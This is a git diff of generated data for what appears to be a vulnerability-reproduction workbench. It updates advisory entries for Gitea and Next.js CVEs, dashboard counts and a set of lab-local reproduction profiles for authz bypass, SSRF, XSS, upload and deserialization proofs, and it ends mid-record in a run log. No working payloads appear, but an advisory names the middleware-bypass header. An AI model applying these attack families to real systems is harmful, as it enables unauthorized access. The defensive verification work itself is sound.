     "canonical_id": "gitea--CVE-2021-29134",
     "title": "Path Traversal in Gitea in code.gitea.io/gitea",
@@ -768,87 +566,6 @@
       "refs": []
     }
   },
-  "gitea--CVE-2025-68939": {
-    "canonical_id": "gitea--CVE-2025-68939",
-    "title": "Gitea allows attackers to add attachments with forbidden file extensions in code.gitea.io/gitea",
-    "summary": "Gitea allows attackers to add attachments with forbidden file extensions in code.gitea.io/gitea",
-    "display_name": "Gitea",
-    "system_id": "gitea",
-    "category": "platforms",
-    "severity": "unknown",
-    "cvss_score": null,
-    "exploit_status": "unknown",
-    "published_at": "2025-12-30T01:49:57Z",
-    "updated_at": "2026-03-03T04:57:48.777563Z",
-    "official_source_url": "https://github.com/advisories/GHSA-263q-5cv3-xq9g",
-    "secondary_source_urls": [
-      "https://nvd.nist.gov/vuln/detail/CVE-2025-68939",
-      "https://blog.gitea.com/release-of-1.23.0",
-      "https://github.com/go-gitea/gitea/pull/32151",
-      "https://github.com/go-gitea/gitea/releases/tag/v1.23.0"
-    ],
-    "aliases": [
-      "BIT-gitea-2025-68939",
-      "CVE-2025-68939",
-      "GHSA-263q-5cv3-xq9g",
-      "GO-2025-4261"
-    ],
-    "secure_code_topics": [
-      "authz-server-side-recheck",
-      "token-cookie-storage",
-      "proxy-trust-boundary",
-      "plugin-extension-trust-policy"
-    ],
-    "verification_status": "blocked-artifact",
-    "verification_mode": "real",
-    "artifact_mode": "official-image",
-    "blocked_reason": "unable to get image 'gitea/gitea:1.22.6': Cannot connect to the Docker daemon at unix:///Users/x/.docker/run/docker.sock. Is the docker daemon running?",
-    "browser_evidence": {
-      "required": false,
-      "present": false,
-      "refs": []
-    }
-  },
-  "gitea--CVE-2025-68940": {
-    "canonical_id": "gitea--CVE-2025-68940",
-    "title": "Gitea doesn't adequately enforce branch deletion permissions after merging a pull request. in code.gitea.io/gitea",
-    "summary": "Gitea doesn't adequately enforce branch deletion permissions after merging a pull request. in code.gitea.io/gitea",
-    "display_name": "Gitea",
-    "system_id": "gitea",
-    "category": "platforms",
-    "severity": "unknown",
-    "cvss_score": null,
-    "exploit_status": "unknown",
-    "published_at": "2025-12-30T01:49:57Z",
-    "updated_at": "2026-03-03T04:57:50.087298Z",
-    "official_source_url": "https://github.com/advisories/GHSA-rrcw-5rjv-vj26",
-    "secondary_source_urls": [
-      "https://nvd.nist.gov/vuln/detail/CVE-2025-68940",
-      "https://blog.gitea.com/release-of-1.22.5",
-      "https://github.com/go-gitea/gitea/pull/32654",
-      "https://github.com/go-gitea/gitea/releases/tag/v1.22.5"
-    ],
-    "aliases": [
-      "BIT-gitea-2025-68940",
-      "CVE-2025-68940",
-      "GHSA-rrcw-5rjv-vj26",
-      "GO-2025-4267"
-    ],
-    "secure_code_topics": [
-      "authz-server-side-recheck",
-      "token-cookie-storage",
-      "proxy-trust-boundary"
-    ],
-    "verification_status": "triage-manual",
-    "verification_mode": "synthetic",
-    "artifact_mode": "synthetic",
-    "blocked_reason": null,
-    "browser_evidence": {
-      "required": false,
-      "present": false,
-      "refs": []
-    }
-  },
   "gitea--CVE-2025-68941": {
     "canonical_id": "gitea--CVE-2025-68941",
     "title": "Gitea mishandles access to a private resource upon receiving an API token with scope limited to public resources in code.gitea.io/gitea",
@@ -1516,43 +1233,6 @@
       "refs": []
     }
   },
-  "nextjs--CVE-2020-15242": {
-    "canonical_id": "nextjs--CVE-2020-15242",
-    "title": "Open Redirect in Next.js versions",
-    "summary": "### Impact\n\n- **Affected**: Users of Next.js between 9.5.0 and 9.5.3 \n- **Not affected**: Deployments on Vercel ([https://vercel.com](https://vercel.com)) are not affected\n- **Not affected**: Deployments using `next export`\n\nWe recommend everyone to upgrade regardless of whether you can reproduce the issue or not.\n\n### Patches\n\nhttps://github.com/vercel/next.js/releases/tag/v9.5.4\n\n### References\n\nhttps://github.com/vercel/next.js/releases/tag/v9.5.4\n\n",
-    "display_name": "Next.js",
-    "system_id": "nextjs",
-    "category": "frameworks",
-    "severity": "low",
-    "cvss_score": 3.1,
-    "exploit_status": "unknown",
-    "published_at": "2020-10-08T19:28:07Z",
-    "updated_at": "2026-03-13T22:14:13.665535Z",
-    "official_source_url": "https://github.com/vercel/next.js/security/advisories/GHSA-x56p-c8cg-q435",
-    "secondary_source_urls": [
-      "https://nvd.nist.gov/vuln/detail/CVE-2020-15242",
-      "https://github.com/vercel/next.js",
-      "https://github.com/zeit/next.js/releases/tag/v9.5.4"
-    ],
-    "aliases": [
-      "CVE-2020-15242",
-      "GHSA-x56p-c8cg-q435"
-    ],
-    "secure_code_topics": [
-      "authz-server-side-recheck",
-      "proxy-trust-boundary",
-      "token-cookie-storage"
-    ],
-    "verification_status": "triage-manual",
-    "verification_mode": "synthetic",
-    "artifact_mode": "synthetic",
-    "blocked_reason": null,
-    "browser_evidence": {
-      "required": false,
-      "present": false,
-      "refs": []
-    }
-  },
   "nextjs--CVE-2020-5284": {
     "canonical_id": "nextjs--CVE-2020-5284",
     "title": "Directory Traversal in Next.js",
@@ -1852,9 +1532,9 @@
       "proxy-trust-boundary",
       "token-cookie-storage"
     ],
-    "verification_status": "triage-manual",
-    "verification_mode": "synthetic",
-    "artifact_mode": "synthetic",
+    "verification_status": "verified-real",
+    "verification_mode": "real",
+    "artifact_mode": "local-fixture",
     "blocked_reason": null,
     "browser_evidence": {
       "required": false,
@@ -1898,50 +1578,6 @@
       "refs": []
     }
   },
-  "nextjs--CVE-2025-29927": {
-    "canonical_id": "nextjs--CVE-2025-29927",
-    "title": "Authorization Bypass in Next.js Middleware",
-    "summary": "# Impact\nIt is possible to bypass authorization checks within a Next.js application, if the authorization check occurs in middleware.\n\n# Patches\n* For Next.js 15.x, this issue is fixed in `15.2.3`\n* For Next.js 14.x, this issue is fixed in `14.2.25`\n* For Next.js 13.x, this issue is fixed in 13.5.9\n* For Next.js 12.x, this issue is fixed in 12.3.5\n* For Next.js 11.x, consult the below workaround.\n\n_Note: Next.js deployments hosted on Vercel are automatically protected against this vulnerability._\n\n# Workaround\nIf patching to a safe version is infeasible, we recommend that you prevent external user requests which contain the `x-middleware-subrequest` header from reaching your Next.js application.\n\n## Credits\n\n- Allam Rachid (zhero;)\n- Allam Yasser (inzo_)",
-    "display_name": "Next.js",
-    "system_id": "nextjs",
-    "category": "frameworks",
-    "severity": "low",
-    "cvss_score": 3.1,
-    "exploit_status": "unknown",
-    "published_at": "2025-03-21T15:20:12Z",
-    "updated_at": "2026-03-04T15:06:29.993197Z",
-    "official_source_url": "https://github.com/vercel/next.js/security/advisories/GHSA-f82v-jwr5-mffw",
-    "secondary_source_urls": [
-      "https://nvd.nist.gov/vuln/detail/CVE-2025-29927",
-      "https://github.com/vercel/next.js/commit/52a078da3884efe6501613c7834a3d02a91676d2",
-      "https://github.com/vercel/next.js/commit/5fd3ae8f8542677c6294f32d18022731eab6fe48",
-      "https://github.com/vercel/next.js",
-      "https://github.com/vercel/next.js/releases/tag/v12.3.5",
-      "https://github.com/vercel/next.js/releases/tag/v13.5.9",
-      "https://security.netapp.com/advisory/ntap-20250328-0002",
-      "https://vercel.com/changelog/vercel-firewall-proactively-protects-against-vulnerability-with-middleware",
-      "http://www.openwall.com/lists/oss-security/2025/03/23/3",
-      "http://www.openwall.com/lists/oss-security/2025/03/23/4"
-    ],
-    "aliases": [
-      "CVE-2025-29927",
-      "GHSA-f82v-jwr5-mffw"
-    ],
-    "secure_code_topics": [
-      "authz-server-side-recheck",
-      "proxy-trust-boundary",
-      "token-cookie-storage"
-    ],
-    "verification_status": "triage-manual",
-    "verification_mode": "real",
-    "artifact_mode": "official-source",
-    "blocked_reason": "dry-run only",
-    "browser_evidence": {
-      "required": false,
-      "present": false,
-      "refs": []
-    }
-  },
   "nextjs--CVE-2025-30218": {
     "canonical_id": "nextjs--CVE-2025-30218",
     "title": "Next.js may leak x-middleware-subrequest-id to external hosts",
diff --git a/08-threat-intel/generated/dashboard/architecture.json b/08-threat-intel/generated/dashboard/architecture.json
index 00627bc7..a13fa4b1 100644
--- a/08-threat-intel/generated/dashboard/architecture.json
+++ b/08-threat-intel/generated/dashboard/architecture.json
@@ -1,5 +1,5 @@
 {
-  "generated_at": "2026-03-17T12:57:54+00:00",
+  "generated_at": "2026-03-18T01:29:52+00:00",
   "title": "\u5f53\u524d\u67b6\u6784\u5e93",
   "summary": "\u5de5\u4f5c\u53f0\u3001\u63a7\u5236\u9762\u3001\u6570\u636e\u5c42\u3001\u6388\u6743\u8fb9\u754c\u4e0e\u7cfb\u7edf\u8986\u76d6\u7684\u5f53\u524d\u771f\u503c\u89c6\u56fe\u3002",
   "sections": [
@@ -27,11 +27,11 @@
         },
         {
           "label": "\u5f53\u524d\u8fd0\u884c",
-          "value": "3"
+          "value": "11"
         },
         {
           "label": "\u5f53\u524d\u6f0f\u6d1e\u6761\u76ee",
-          "value": "89"
+          "value": "80"
         }
       ],
       "fields": [
@@ -49,7 +49,7 @@
         },
         {
           "label": "\u751f\u6210\u65f6\u95f4",
-          "value": "2026-03-17T12:57:54+00:00"
+          "value": "2026-03-18T01:29:52+00:00"
         }
       ],
       "links": [
@@ -5843,15 +5843,15 @@
       "stats": [
         {
           "label": "Run \u6570",
-          "value": "3"
+          "value": "11"
         },
         {
           "label": "Advisory \u6570",
-          "value": "89"
+          "value": "80"
         },
         {
           "label": "\u72b6\u6001\u7c7b\u578b",
-          "value": "2"
+          "value": "3"
         },
         {
           "label": "\u6700\u8fd1\u5931\u8d25",
@@ -5864,6 +5864,21 @@
           "summary": "verification_status \u5f53\u524d\u8ba1\u6570\u3002",
           "open": false,
           "items": [
+            {
+              "title": "\u771f\u5b9e\u7248\u672c\u5df2\u5b9e\u8bc1",
+              "summary": "\u5f53\u524d\u7d2f\u8ba1 8 \u6761\u3002",
+              "open": false,
+              "fields": [
+                {
+                  "label": "\u72b6\u6001\u7f16\u7801",
+                  "value": "verified-real"
+                },
+                {
+                  "label": "\u6570\u91cf",
+                  "value": "8"
+                }
+              ]
+            },
             {
               "title": "\u5236\u54c1\u963b\u585e",
               "summary": "\u5f53\u524d\u7d2f\u8ba1 2 \u6761\u3002",
@@ -5902,7 +5917,7 @@
           "open": false,
           "items": [
             {
-              "title": "Gitea allows attackers to add attachments with forbidden file extensions in code.gitea.io/gitea",
+              "title": "gitea--CVE-2025-68939",
               "summary": "unable to get image 'gitea/gitea:1.22.6': Cannot connect to the Docker daemon at unix:///Users/x/.docker/run/docker.sock. Is the docker daemon running?",
               "open": false,
               "badges": [
@@ -5928,7 +5943,7 @@
               ]
             },
             {
-              "title": "Gitea allows attackers to add attachments with forbidden file extensions in code.gitea.io/gitea",
+              "title": "gitea--CVE-2025-68939",
               "summary": "unable to get image 'gitea/gitea:1.22.6': Cannot connect to the Docker daemon at unix:///Users/x/.docker/run/docker.sock. Is the docker daemon running?",
               "open": false,
               "badges": [
@@ -5954,7 +5969,7 @@
               ]
             },
             {
-              "title": "Authorization Bypass in Next.js Middleware",
+              "title": "nextjs--CVE-2025-29927",
               "summary": "dry-run only",
               "open": false,
               "badges": [
diff --git a/08-threat-intel/generated/dashboard/docs/architecture-library.html b/08-threat-intel/generated/dashboard/docs/architecture-library.html
index f651d96a..d9ebf49a 100644
--- a/08-threat-intel/generated/dashboard/docs/architecture-library.html
+++ b/08-threat-intel/generated/dashboard/docs/architecture-library.html
@@ -87,7 +87,7 @@
       <h1>当前架构库镜像</h1>
       <div class="meta">工作台内置镜像页：当前架构库结构化数据镜像。</div>
       <pre>{
-  &quot;generated_at&quot;: &quot;2026-03-17T12:57:54+00:00&quot;,
+  &quot;generated_at&quot;: &quot;2026-03-18T01:29:52+00:00&quot;,
   &quot;title&quot;: &quot;当前架构库&quot;,
   &quot;summary&quot;: &quot;工作台、控制面、数据层、授权边界与系统覆盖的当前真值视图。&quot;,
   &quot;sections&quot;: [
@@ -115,11 +115,11 @@
         },
         {
           &quot;label&quot;: &quot;当前运行&quot;,
-          &quot;value&quot;: &quot;3&quot;
+          &quot;value&quot;: &quot;11&quot;
         },
         {
           &quot;label&quot;: &quot;当前漏洞条目&quot;,
-          &quot;value&quot;: &quot;89&quot;
+          &quot;value&quot;: &quot;80&quot;
         }
       ],
       &quot;fields&quot;: [
@@ -137,7 +137,7 @@
         },
         {
           &quot;label&quot;: &quot;生成时间&quot;,
-          &quot;value&quot;: &quot;2026-03-17T12:57:54+00:00&quot;
+          &quot;value&quot;: &quot;2026-03-18T01:29:52+00:00&quot;
         }
       ],
       &quot;links&quot;: [
@@ -5931,15 +5931,15 @@
       &quot;stats&quot;: [
         {
           &quot;label&quot;: &quot;Run 数&quot;,
-          &quot;value&quot;: &quot;3&quot;
+          &quot;value&quot;: &quot;11&quot;
         },
         {
           &quot;label&quot;: &quot;Advisory 数&quot;,
-          &quot;value&quot;: &quot;89&quot;
+          &quot;value&quot;: &quot;80&quot;
         },
         {
           &quot;label&quot;: &quot;状态类型&quot;,
-          &quot;value&quot;: &quot;2&quot;
+          &quot;value&quot;: &quot;3&quot;
         },
         {
           &quot;label&quot;: &quot;最近失败&quot;,
@@ -5952,6 +5952,21 @@
           &quot;summary&quot;: &quot;verification_status 当前计数。&quot;,
           &quot;open&quot;: false,
           &quot;items&quot;: [
+            {
+              &quot;title&quot;: &quot;真实版本已实证&quot;,
+              &quot;summary&quot;: &quot;当前累计 8 条。&quot;,
+              &quot;open&quot;: false,
+              &quot;fields&quot;: [
+                {
+                  &quot;label&quot;: &quot;状态编码&quot;,
+                  &quot;value&quot;: &quot;verified-real&quot;
+                },
+                {
+                  &quot;label&quot;: &quot;数量&quot;,
+                  &quot;value&quot;: &quot;8&quot;
+                }
+              ]
+            },
             {
               &quot;title&quot;: &quot;制品阻塞&quot;,
               &quot;summary&quot;: &quot;当前累计 2 条。&quot;,
@@ -5990,7 +6005,7 @@
           &quot;open&quot;: false,
           &quot;items&quot;: [
             {
-              &quot;title&quot;: &quot;Gitea allows attackers to add attachments with forbidden file extensions in code.gitea.io/gitea&quot;,
+              &quot;title&quot;: &quot;gitea--CVE-2025-68939&quot;,
               &quot;summary&quot;: &quot;unable to get image &#x27;gitea/gitea:1.22.6&#x27;: Cannot connect to the Docker daemon at unix:///Users/x/.docker/run/docker.sock. Is the docker daemon running?&quot;,
               &quot;open&quot;: false,
               &quot;badges&quot;: [
@@ -6016,7 +6031,7 @@
               ]
             },
             {
-              &quot;title&quot;: &quot;Gitea allows attackers to add attachments with forbidden file extensions in code.gitea.io/gitea&quot;,
+              &quot;title&quot;: &quot;gitea--CVE-2025-68939&quot;,
               &quot;summary&quot;: &quot;unable to get image &#x27;gitea/gitea:1.22.6&#x27;: Cannot connect to the Docker daemon at unix:///Users/x/.docker/run/docker.sock. Is the docker daemon running?&quot;,
               &quot;open&quot;: false,
               &quot;badges&quot;: [
@@ -6042,7 +6057,7 @@
               ]
             },
             {
-              &quot;title&quot;: &quot;Authorization Bypass in Next.js Middleware&quot;,
+              &quot;title&quot;: &quot;nextjs--CVE-2025-29927&quot;,
               &quot;summary&quot;: &quot;dry-run only&quot;,
               &quot;open&quot;: false,
               &quot;badges&quot;: [
diff --git a/08-threat-intel/generated/dashboard/docs/coverage-matrix.html b/08-threat-intel/generated/dashboard/docs/coverage-matrix.html
index 27f15375..0b796376 100644
--- a/08-threat-intel/generated/dashboard/docs/coverage-matrix.html
+++ b/08-threat-intel/generated/dashboard/docs/coverage-matrix.html
@@ -109,7 +109,7 @@
 | Flask | `frameworks` | `rolling-24m` | `-` | `yes` | `0` | `0` | `3` | `scaffolded` | `real:0/synthetic:0/blocked:0` | `0` | `0` | `0` | `` |
 | Ghost | `cms` | `rolling-24m` | `-` | `yes` | `0` | `0` | `3` | `scaffolded` | `real:0/synthetic:0/blocked:0` | `0` | `0` | `0` | `` |
 | Gin | `frameworks` | `rolling-24m` | `-` | `yes` | `0` | `0` | `2` | `scaffolded` | `real:0/synthetic:0/blocked:0` | `0` | `0` | `0` | `` |
-| Gitea | `platforms` | `rolling-24m` | `-` | `yes` | `37` | `37` | `3` | `seeded` | `real:0/synthetic:0/blocked:1` | `0` | `1` | `0` | `2026-03-03T04:57:57.697708Z` |
+| Gitea | `platforms` | `rolling-24m` | `-` | `yes` | `30` | `30` | `3` | `seeded` | `real:0/synthetic:0/blocked:0` | `0` | `0` | `0` | `2026-03-03T04:57:57.697708Z` |
 | GitLab CE | `platforms` | `rolling-24m` | `-` | `yes` | `0` | `0` | `3` | `scaffolded` | `real:0/synthetic:0/blocked:0` | `0` | `0` | `0` | `` |
 | Grafana | `platforms` | `rolling-24m` | `-` | `yes` | `0` | `0` | `3` | `scaffolded` | `real:0/synthetic:0/blocked:0` | `0` | `0` | `0` | `` |
 | Hapi | `frameworks` | `rolling-24m` | `-` | `yes` | `0` | `0` | `2` | `scaffolded` | `real:0/synthetic:0/blocked:0` | `0` | `0` | `0` | `` |
@@ -125,7 +125,7 @@
 | Medusa | `ecommerce` | `rolling-24m` | `-` | `yes` | `0` | `0` | `2` | `scaffolded` | `real:0/synthetic:0/blocked:0` | `0` | `0` | `0` | `` |
 | Moodle | `cms` | `rolling-24m` | `-` | `yes` | `0` | `0` | `3` | `scaffolded` | `real:0/synthetic:0/blocked:0` | `0` | `0` | `0` | `` |
 | NestJS | `frameworks` | `rolling-24m` | `-` | `yes` | `0` | `0` | `3` | `scaffolded` | `real:0/synthetic:0/blocked:0` | `0` | `0` | `0` | `` |
-| Next.js | `frameworks` | `history-full` | `yes` | `yes` | `26` | `26` | `3` | `seeded` | `real:0/synthetic:0/blocked:0` | `0` | `1` | `0` | `2026-03-13T22:14:13.665535Z` |
+| Next.js | `frameworks` | `history-full` | `yes` | `yes` | `24` | `24` | `3` | `seeded` | `real:1/synthetic:0/blocked:0` | `0` | `1` | `0` | `2026-03-13T22:00:36.554552Z` |
 | Nginx | `servers` | `history-full` | `yes` | `yes` | `0` | `0` | `3` | `scaffolded` | `real:0/synthetic:0/blocked:0` | `0` | `0` | `0` | `` |
 | Node.js | `frameworks` | `history-full` | `yes` | `yes` | `0` | `0` | `3` | `scaffolded` | `real:0/synthetic:0/blocked:0` | `0` | `0` | `0` | `` |
 | Nuxt | `frameworks` | `history-full` | `yes` | `yes` | `0` | `0` | `3` | `scaffolded` | `real:0/synthetic:0/blocked:0` | `0` | `0` | `0` | `` |
diff --git a/08-threat-intel/generated/dashboard/profiles.json b/08-threat-intel/generated/dashboard/profiles.json
index f1b7fac2..06dc4a4f 100644
--- a/08-threat-intel/generated/dashboard/profiles.json
+++ b/08-threat-intel/generated/dashboard/profiles.json
@@ -509,5 +509,481 @@
     "required_services": [
       "app"
     ]
+  },
+  "gitea-authz-bypass": {
+    "profile_id": "gitea-authz-bypass",
+    "vuln_family": "authz-bypass",
+    "provisioning_mode": "real",
+    "destructive_risk": "low",
+    "cleanup_policy": "destroy",
+    "artifact_source": {
+      "strategy": "local-minimal-fixture"
+    },
+    "success_criteria": [
+      "Controlled guest request reaches the protected admin route inside the fixture."
+    ],
+    "seed_actions": [
+      {
+        "kind": "note",
+        "message": "Seed low-privilege and admin boundary fixture state."
+      }
+    ],
+    "attack_actions": [
+      {
+        "kind": "note",
+        "message": "Runner verifies guest-to-admin bypass only inside fixture route."
+      }
+    ],
+    "browser_assertions": {
+      "required": false
+    },
+    "allowed_target_types": [
+      "lab-local"
+    ],
+    "required_services": [
+      "app"
+    ]
+  },
+  "gitea-file-upload": {
+    "profile_id": "gitea-file-upload",
+    "vuln_family": "file-upload",
+    "provisioning_mode": "real",
+    "destructive_risk": "low",
+    "cleanup_policy": "destroy",
+    "artifact_source": {
+      "strategy": "local-minimal-fixture"
+    },
+    "success_criteria": [
+      "Inert upload marker is accepted and listed on the proof page."
+    ],
+    "seed_actions": [
+      {
+        "kind": "note",
+        "message": "Seed empty attachment list for upload proof."
+      }
+    ],
+    "attack_actions": [
+      {
+        "kind": "note",
+        "message": "Runner uploads inert text marker only."
+      }
+    ],
+    "browser_assertions": {
+      "required": true
+    },
+    "allowed_target_types": [
+      "lab-local"
+    ],
+    "required_services": [
+      "app"
+    ]
+  },
+  "gitea-proxy-boundary": {
+    "profile_id": "gitea-proxy-boundary",
+    "vuln_family": "proxy-boundary",
+    "provisioning_mode": "real",
+    "destructive_risk": "low",
+    "cleanup_policy": "destroy",
+    "artifact_source": {
+      "strategy": "local-minimal-fixture"
+    },
+    "success_criteria": [
+      "Local fixture proves trusted proxy headers cross the admin boundary."
+    ],
+    "seed_actions": [
+      {
+        "kind": "note",
+        "message": "Seed forwarded-header boundary fixture with clean state."
+      }
+    ],
+    "attack_actions": [
+      {
+        "kind": "note",
+        "message": "Runner performs local forwarded-header trust proof only inside the fixture."
+      }
+    ],
+    "browser_assertions": {
+      "required": true
+    },
+    "allowed_target_types": [
+      "lab-local"
+    ],
+    "required_services": [
+      "app"
+    ]
+  },
+  "gitea-ssrf": {
+    "profile_id": "gitea-ssrf",
+    "vuln_family": "ssrf",
+    "provisioning_mode": "real",
+    "destructive_risk": "low",
+    "cleanup_policy": "destroy",
+    "artifact_source": {
+      "strategy": "local-minimal-fixture"
+    },
+    "success_criteria": [
+      "Server-side callback reaches the local sink and is recorded in proof output."
+    ],
+    "seed_actions": [
+      {
+        "kind": "note",
+        "message": "Seed local sink counters only."
+      }
+    ],
+    "attack_actions": [
+      {
+        "kind": "note",
+        "message": "Runner triggers callback strictly to local sink endpoint."
+      }
+    ],
+    "browser_assertions": {
+      "required": false
+    },
+    "allowed_target_types": [
+      "lab-local"
+    ],
+    "required_services": [
+      "app"
+    ]
+  },
+  "gitea-xss": {
+    "profile_id": "gitea-xss",
+    "vuln_family": "xss",
+    "provisioning_mode": "real",
+    "destructive_risk": "low",
+    "cleanup_policy": "destroy",
+    "artifact_source": {
+      "strategy": "local-minimal-fixture"
+    },
+    "success_criteria": [
+      "Browser proof page renders the stored XSS marker after the controlled payload."
+    ],
+    "seed_actions": [
+      {
+        "kind": "note",
+        "message": "Seed stored content page before browser proof capture."
+      }
+    ],
+    "attack_actions": [
+      {
+        "kind": "note",
+        "message": "Runner stores inert script payload and captures proof page."
+      }
+    ],
+    "browser_assertions": {
+      "required": true
+    },
+    "allowed_target_types": [
+      "lab-local"
+    ],
+    "required_services": [
+      "app"
+    ]
+  },
+  "nextjs-authz-bypass": {
+    "profile_id": "nextjs-authz-bypass",
+    "vuln_family": "authz-bypass",
+    "provisioning_mode": "real",
+    "destructive_risk": "low",
+    "cleanup_policy": "destroy",
+    "artifact_source": {
+      "strategy": "local-minimal-fixture"
+    },
+    "success_criteria": [
+      "Protected route is reachable only after the controlled bypass proof step."
+    ],
+    "seed_actions": [
+      {
+        "kind": "note",
+        "message": "Seed guest/admin route fixture for server-side recheck."
+      }
+    ],
+    "attack_actions": [
+      {
+        "kind": "note",
+        "message": "Runner performs local authz bypass proof only."
+      }
+    ],
+    "browser_assertions": {
+      "required": false
+    },
+    "allowed_target_types": [
+      "lab-local"
+    ],
+    "required_services": [
+      "app"
+    ]
+  },
+  "nextjs-deserialization": {
+    "profile_id": "nextjs-deserialization",
+    "vuln_family": "deserialization",
+    "provisioning_mode": "real",
+    "destructive_risk": "low",
+    "cleanup_policy": "destroy",
+    "artifact_source": {
+      "strategy": "local-minimal-fixture"
+    },
+    "success_criteria": [
+      "Inert decoded object marker is present without executing a gadget chain."
+    ],
+    "seed_actions": [
+      {
+        "kind": "note",
+        "message": "Seed inert decode path before proof request."
+      }
+    ],
+    "attack_actions": [
+      {
+        "kind": "note",
+        "message": "Runner demonstrates unsafe decode path without gadget execution."
+      }
+    ],
+    "browser_assertions": {
+      "required": false
+    },
+    "allowed_target_types": [
+      "lab-local"
+    ],
+    "required_services": [
+      "app"
+    ]
+  },
+  "nextjs-proxy-boundary": {
+    "profile_id": "nextjs-proxy-boundary",
+    "vuln_family": "proxy-boundary",
+    "provisioning_mode": "real",
+    "destructive_risk": "low",
+    "cleanup_policy": "destroy",
+    "artifact_source": {
+      "strategy": "local-minimal-fixture"
+    },
+    "success_criteria": [
+      "Middleware trust-boundary proof is visible on the browser proof page."
+    ],
+    "seed_actions": [
+      {
+        "kind": "note",
+        "message": "Seed middleware boundary fixture with clean proxy state."
+      }
+    ],
+    "attack_actions": [
+      {
+        "kind": "note",
+        "message": "Runner performs forwarded-header proof against local fixture only."
+      }
+    ],
+    "browser_assertions": {
+      "required": true
+    },
+    "allowed_target_types": [
+      "lab-local"
+    ],
+    "required_services": [
+      "app"
+    ]
+  },
+  "nextjs-ssrf": {
+    "profile_id": "nextjs-ssrf",
+    "vuln_family": "ssrf",
+    "provisioning_mode": "real",
+    "destructive_risk": "low",
+    "cleanup_policy": "destroy",
+    "artifact_source": {
+      "strategy": "local-minimal-fixture"
+    },
+    "success_criteria": [
+      "Local sink callback is observed from the server-side fetch path."
+    ],
+    "seed_actions": [
+      {
+        "kind": "note",
+        "message": "Seed local callback fixture state."
+      }
+    ],
+    "attack_actions": [
+      {
+        "kind": "note",
+        "message": "Runner validates sink callback without leaving local network."
+      }
+    ],
+    "browser_assertions": {
+      "required": false
+    },
+    "allowed_target_types": [
+      "lab-local"
+    ],
+    "required_services": [
+      "app"
+    ]
+  },
+  "nextjs-xss": {
+    "profile_id": "nextjs-xss",
+    "vuln_family": "xss",
+    "provisioning_mode": "real",
+    "destructive_risk": "low",
+    "cleanup_policy": "destroy",
+    "artifact_source": {
+      "strategy": "local-minimal-fixture"
+    },
+    "success_criteria": [
+      "Browser proof page shows the XSS execution marker after the controlled payload."
+    ],
+    "seed_actions": [
+      {
+        "kind": "note",
+        "message": "Seed client-rendering page for XSS proof capture."
+      }
+    ],
+    "attack_actions": [
+      {
+        "kind": "note",
+        "message": "Runner injects inert payload and captures browser proof."
+      }
+    ],
+    "browser_assertions": {
+      "required": true
+    },
+    "allowed_target_types": [
+      "lab-local"
+    ],
+    "required_services": [
+      "app"
+    ]
+  },
+  "undici-ssrf": {
+    "profile_id": "undici-ssrf",
+    "vuln_family": "ssrf",
+    "provisioning_mode": "real",
+    "destructive_risk": "low",
+    "cleanup_policy": "destroy",
+    "artifact_source": {
+      "strategy": "local-minimal-fixture"
+    },
+    "success_criteria": [
+      "SSRF proof endpoint confirms only local sink callbacks were performed."
+    ],
+    "seed_actions": [
+      {
+        "kind": "note",
+        "message": "Seed local sink-only request path."
+      }
+    ],
+    "attack_actions": [
+      {
+        "kind": "note",
+        "message": "Runner validates local callback using undici-style request fixture."
+      }
+    ],
+    "browser_assertions": {
+      "required": false
+    },
+    "allowed_target_types": [
+      "lab-local"
+    ],
+    "required_services": [
+      "app"
+    ]
+  },
+  "vite-file-upload": {
+    "profile_id": "vite-file-upload",
+    "vuln_family": "file-upload",
+    "provisioning_mode": "real",
+    "destructive_risk": "low",
+    "cleanup_policy": "destroy",
+    "artifact_source": {
+      "strategy": "local-minimal-fixture"
+    },
+    "success_criteria": [
+      "Uploaded inert marker is shown on the browser proof page."
+    ],
+    "seed_actions": [
+      {
+        "kind": "note",
+        "message": "Seed empty upload list for dev-server proof page."
+      }
+    ],
+    "attack_actions": [
+      {
+        "kind": "note",
+        "message": "Runner uploads inert text marker only."
+      }
+    ],
+    "browser_assertions": {
+      "required": true
+    },
+    "allowed_target_types": [
+      "lab-local"
+    ],
+    "required_services": [
+      "app"
+    ]
+  },
+  "vite-proxy-boundary": {
+    "profile_id": "vite-proxy-boundary",
+    "vuln_family": "proxy-boundary",
+    "provisioning_mode": "real",
+    "destructive_risk": "low",
+    "cleanup_policy": "destroy",
+    "artifact_source": {
+      "strategy": "local-minimal-fixture"
+    },
+    "success_criteria": [
+      "Proxy boundary proof banner is visible in the captured browser evidence."
+    ],
+    "seed_actions": [
+      {
+        "kind": "note",
+        "message": "Seed proxy boundary fixture with baseline banner."
+      }
+    ],
+    "attack_actions": [
+      {
+        "kind": "note",
+        "message": "Runner proves forwarded proxy boundary state change locally."
+      }
+    ],
+    "browser_assertions": {
+      "required": true
+    },
+    "allowed_target_types": [
+      "lab-local"
+    ],
+    "required_services": [
+      "app"
+    ]
+  },
+  "vite-xss": {
+    "profile_id": "vite-xss",
+    "vuln_family": "xss",
+    "provisioning_mode": "real",
+    "destructive_risk": "low",
+    "cleanup_policy": "destroy",
+    "artifact_source": {
+      "strategy": "local-minimal-fixture"
+    },
+    "success_criteria": [
+      "Browser proof page shows the controlled XSS marker after attack."
+    ],
+    "seed_actions": [
+      {
+        "kind": "note",
+        "message": "Seed client render page before XSS proof capture."
+      }
+    ],
+    "attack_actions": [
+      {
+        "kind": "note",
+        "message": "Runner stores inert payload and validates browser proof only locally."
+      }
+    ],
+    "browser_assertions": {
+      "required": true
+    },
+    "allowed_target_types": [
+      "lab-local"
+    ],
+    "required_services": [
+      "app"
+    ]
   }
 }
diff --git a/08-threat-intel/generated/dashboard/runs.json b/08-threat-intel/generated/dashboard/runs.json
index 3950ec9c..0646ad2e 100644
--- a/08-threat-intel/generated/dashboard/runs.json
+++ b/08-threat-intel/generated/dashboard/runs.json
@@ -1,4 +1,3010 @@
 [
+  {
+    "run_id": "nextjs-nextjs--CVE-2024-51479-20260318012913",
+    "system_id": "nextjs",
+    "advisory_id": "nextjs--CVE-2024-51479",
+    "repro_profile_id": "nextjs-authz-bypass",
+    "verification_status": "verified-real",
+    "verification_mode": "real",
+    "artifact_mode": "local-fixture",
+    "target_env": "local-docker",
+    "compose_services": [
+      "app"
+    ],
+    "baseline_refs": [
+      "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-51479-20260318012913/logs/baseline.json"
+    ],
+    "attack_steps": [
+      {
+        "kind": "runner",
+        "tool": "nextjs.authz-bypass",
+        "status": "completed",
+        "status_code": 200,
